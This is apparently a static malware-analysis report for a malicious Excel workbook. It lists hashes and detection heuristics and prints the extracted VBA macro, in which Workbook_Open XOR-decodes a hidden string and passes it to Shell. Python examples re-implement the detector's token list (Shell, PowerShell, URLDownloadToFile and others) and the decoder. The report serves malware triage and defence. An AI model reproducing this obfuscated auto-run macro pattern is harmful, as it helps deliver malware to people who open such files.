Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 671015570338f526…

MALICIOUS

Office (OOXML) / .XLSX

Size: 153.2 KB
Created: 2020-03-17 22:13:01 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2020-05-25
MD5: 7906950d3dd3bff86d65b514418b2910
SHA-1: 4c9b4c42c16471ff32758337fd66a35fc4d62695
SHA-256: 671015570338f52663157da906eb6f24e1f5298146f07d25b914af9795984ad4
Risk score: 130

Heuristics (5)

  • VBA project inside OOXML medium OOXML_VBA (3 related findings)
    Document contains a VBA project (VBA macros present)
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
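The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC is easy to reproduce on a carved stream. The Python below is an added example written for this report, not the scanner's own code: it searches a raw module or cache stream for the two token sets listed in the heuristic and fires only when a token from each set is present. The streams it runs on are constructed (one is trimmed from the macro preview further down this report, the others are made up), and checking UTF-16LE as well as 8-bit text is this example's own precaution rather than something the report states.

```python
"""Token-pair check modelled on the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic.
Added example; the streams below are constructed, not carved from the sample."""
import re

# Token lists copied from the heuristic description in the report.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _token_hits(stream: bytes, tokens) -> list[str]:
    """Return the tokens present in the stream.

    Matching is case-insensitive (VBA identifiers are) and tries each token
    both as 8-bit text and as UTF-16LE. Looking at both encodings is an
    assumption of this example about how identifiers survive in project
    streams, not a statement from the report.
    """
    hits = []
    for tok in tokens:
        patterns = (re.escape(tok.encode("latin-1")),
                    re.escape(tok.encode("utf-16-le")))
        if any(re.search(p, stream, re.IGNORECASE) for p in patterns):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream: bytes) -> tuple[bool, list[str], list[str]]:
    """Fire only when an auto-exec entry point AND an execution token co-occur.

    Returns (fires, autoexec_hits, exec_hits) so the matched tokens can be
    reported, which is what the heuristic's detail line is for.
    """
    auto = _token_hits(stream, AUTOEXEC_TOKENS)
    exe = _token_hits(stream, EXEC_TOKENS)
    return (bool(auto) and bool(exe), auto, exe)


# Constructed streams (not carved from the sample). BOTH_8BIT is trimmed from
# the ThisWorkbook module shown in the preview; the others are made up.
ONLY_AUTOEXEC = b'Attribute VB_Name = "ThisWorkbook"\r\nPublic Sub Workbook_Open()\r\nMsgBox 1\r\nEnd Sub'
ONLY_EXEC = b"Public Sub Helper()\r\nShell (cmd)\r\nEnd Sub"
BOTH_8BIT = b"Public Sub Workbook_Open()\r\nShell (cmd)\r\nEnd Sub"
BOTH_UTF16 = "Workbook_Open\x00CreateObject".encode("utf-16-le")

if __name__ == "__main__":
    for name, stream in (("only auto-exec", ONLY_AUTOEXEC), ("only exec", ONLY_EXEC),
                         ("both, 8-bit", BOTH_8BIT), ("both, UTF-16LE", BOTH_UTF16)):
        fires, auto, exe = pcode_autoexec_exec(stream)
        print(f"{name:15} fires={fires} autoexec={auto} exec={exe}")
```

Because "Shell" is matched as a substring, a stream containing only ShellExecute reports both Shell and ShellExecute; that is acceptable for a heuristic whose purpose is to surface macros whose source could not be extracted, but it is one reason the rule carries a severity of high rather than critical.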

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3386 bytes
SHA-256: 848e2e71c218d22d14c5b3ef64ae890fc6107f4bf973b1a45fcdc3a8b7d003b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
Dim Z×°Ÿ³ÇŸº³ì•¾™™¹¾y††Déºà½Y´–Œ•…¤°¹œ½½•¶°i¥–ņ•¼³±œ§†XØ As String
Dim ¤i•ÌÕ•m••»¾OÕœàì¼Õñöyñº½ñ½œø°´¹§†È¼±•¾·à¬™†¾¾ÌO×B€•â¾™½ As String
Dim é–¤´–·•±Õ•ñ°î±º³ñ„Â¼é¹§àœ±•¾â¥•Œ•´½ÇNZ……½ä¹§øN»§´‚Ÿ°ñ± As String
Dim o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª As String
Dim cc As String
Dim •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ As String
•§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ = "intXOintXOrValue1rVintXOrValue1alue1"
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ + (Replace(a("XXXXXXX", "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"), " xX " + cc, ""))
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = Replace(o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª, •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚, "")
Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
End Sub
    Public Function a(CodeKey As String, DataIn As String) As String
        Dim lonDataPtr As Long
        Dim strDataOut As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(DataIn) / 2)
            intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
            strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        a = strDataOut
    End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
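The deobfuscation performed by Workbook_Open can be reproduced outside Office. The Python below is an added example, not part of the report or of the sample: it mirrors the VBA function a exactly, including the 1-based key index that XORs the first byte with the key's second character, and then applies the two Replace steps that strip the " xX " separators and the junk marker before the result reaches Shell. Although the carver labels the blob base64-like, a consumes it as hexadecimal byte pairs via Val("&H" ...). The sample's hex blob is not reproduced in the report, so the blob used here is constructed: it encodes the harmless string "notepad.exe" with one " xX " separator inserted, under the sample's key "XXXXXXX". What the real sample passed to Shell cannot be determined from this page.

```python
"""Re-implementation of the XOR / junk-string deobfuscation used by the
Workbook_Open macro above. Added example; the hex blob below is constructed."""

JUNK_MARKER = "intXOintXOrValue1rVintXOrValue1alue1"  # literal from the macro source
SAMPLE_KEY = "XXXXXXX"                                  # CodeKey literal from the macro source


def a(code_key: str, data_in: str) -> str:
    """Mirror of the VBA Function a(CodeKey, DataIn).

    Each pair of hex digits is one ciphertext byte. The VBA key index is
    (lonDataPtr Mod Len(CodeKey)) + 1 with a 1-based Mid$, so byte 1 is
    XORed with the key's SECOND character and byte Len(CodeKey) with its
    first. Len(DataIn) / 2 is taken as integer division here, which matches
    VBA for the even-length hex strings this scheme produces.
    """
    out = []
    for ptr in range(1, len(data_in) // 2 + 1):
        byte = int(data_in[2 * ptr - 2:2 * ptr], 16)      # Val("&H" & Mid$(DataIn, 2*ptr-1, 2))
        key_char = code_key[ptr % len(code_key)]           # Mid$(CodeKey, (ptr Mod Len) + 1, 1), 0-based here
        out.append(chr(byte ^ ord(key_char)))
    return "".join(out)


def recover_shell_argument(hex_blob: str, key: str = SAMPLE_KEY, cc: str = "") -> str:
    """The three statements that build the Shell() argument in Workbook_Open.

    cc is declared but never assigned in the macro, so it is "" and the first
    Replace removes bare " xX " separators from the decoded text; the second
    strips the junk marker that was prepended purely as noise.
    """
    s = JUNK_MARKER + a(key, hex_blob).replace(" xX " + cc, "")
    s = s.replace(JUNK_MARKER, "")
    return s


def encode_like_sample(plaintext: str, key: str = SAMPLE_KEY) -> str:
    """Inverse of a(); used only to build constructed blobs for testing."""
    return "".join(f"{ord(ch) ^ ord(key[(i + 1) % len(key)]):02X}"
                   for i, ch in enumerate(plaintext))


# Constructed blob (NOT the sample's): "note xX pad.exe" XORed with 'X' (0x58).
CONSTRUCTED_BLOB = "36372C3D7820007828393C763D203D"

if __name__ == "__main__":
    print(repr(a(SAMPLE_KEY, CONSTRUCTED_BLOB)))           # 'note xX pad.exe'
    print(repr(recover_shell_argument(CONSTRUCTED_BLOB)))  # 'notepad.exe'
```

With a seven-character key made of a single repeated letter, the key-index quirk has no effect and every byte is simply XORed with 0x58; a("AB", "2322") returns "ac", which shows the offset for a key whose characters differ. Running recover_shell_argument on the blob carved from the real vbaProject.bin is the quickest way to learn what the macro actually executes.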
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 15872 bytes
SHA-256: a3b7735144f16243ecbb11276ee7309945b5e80fa7ab85b1821793ea72040363
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).